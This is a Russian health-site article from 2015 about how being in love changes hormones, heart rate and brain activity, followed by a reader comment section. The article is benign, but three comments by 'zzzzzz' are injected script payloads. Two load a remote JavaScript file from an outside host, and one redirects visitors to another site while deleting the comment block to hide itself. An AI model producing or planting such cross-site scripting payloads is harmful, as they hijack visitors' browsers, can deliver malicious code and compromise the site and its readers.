Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что любовь сделает с вами...  >>  Что любовь сделает с вами?
 
Обратная связь
 

Что любовь сделает с вами?

Размер шрифта
13 февраля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

От стрел Купидона у вас перехватит дыхание, а сердце будет биться чаще, считают ученые из Университета Лойолы, которые подробно изучили влияние влюбленности на наш организм.

Что любовь сделает с вами?

«Когда мы влюблены, наше тело вырабатывает различные вещества, обеспечивающие прекрасное настроение, и они запускают множество физиологических процессов», – рассказывает Пэт Мумби, профессор психиатрии и нейронаук в медицинской школе Университета Лойолы. «Этот внутренний «эликсир любви» и заставляет наши щеки покрываться румянцем, ладони потеть, а сердца биться чаще». Доказано, что уровень дофамина, адреналина и норадреналина в организме возрастает в период влюбленности. Дофамин обеспечивает чувство эйфории, а адреналин и норадреналин отвечают за учащенное биение сердца и общее возбуждение.

Исследования с использованием МРТ показали, что любовь повышает активность центра удовольствий в головном мозге. Когда мы влюбляемся, кровоток в этой области усиливается. Однако врачи предупреждают, что такие физиологические изменения могут пойти нам не на пользу. «Фраза «любовь слепа» актуальна как никогда, ведь в начале отношений мы идеализируем нашего партнера и видим в нем только те черты, которые сами хотим видеть», – объясняет доктор Мумби. «А вот те, кто наблюдает ваши отношения со стороны, могут смотреть на вещи куда более объективно».

По мнению ученых, существует три основных фазы любви: страсть, притяжение и привязанность. За страсть отвечают гормоны, благодаря которым мы испытываем физическое влечение к партнеру. Кровоток в центре удовольствий в мозге усиливается в фазу притяжения, когда мы наиболее сильно концентрируемся на нашем партнере. Это поведение исчезает во время фазы привязанности, так как организм вырабатывает устойчивость к стимулам удовольствий. Однако в этот период эндорфины и гормоны вазопрессин и окситоцин создают ощущение общего благополучия и безопасности, что очень важно в длительных отношениях.

Влюбленность – это не только эмоции, но еще и множество физиологических изменений в нашем теле, влияющих на наше настроение. Так что если вы влюблены, то точно будете чувствовать себя счастливыми, а сердце будет биться чаще.

О других неожиданных аспектах женского здоровья читайте на страницах нашего одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:18

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Любовь сделает нормальным даже психопата! Любите на здоровье!   Лучший секс в жизни за 2 недели! Вторая неделя   Сколько времени нужно на «любовь с первого взгляда»?   Лучший секс в жизни за 2 недели! Первая неделя  
08 мая 2013Хотите знать, что ваш возлюбленный чувствует по отношению к вам? Послушайте его сердце и сравните со своим! 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить? 26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса!
 

Слайдшоу

1
Жаркий секс за 5 минут!
Как понять, что он тебя любит?
Как настроиться на романтику

Тесты

Заболеет ли ваша семья?
Здорова ли ваша предстательная железа
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.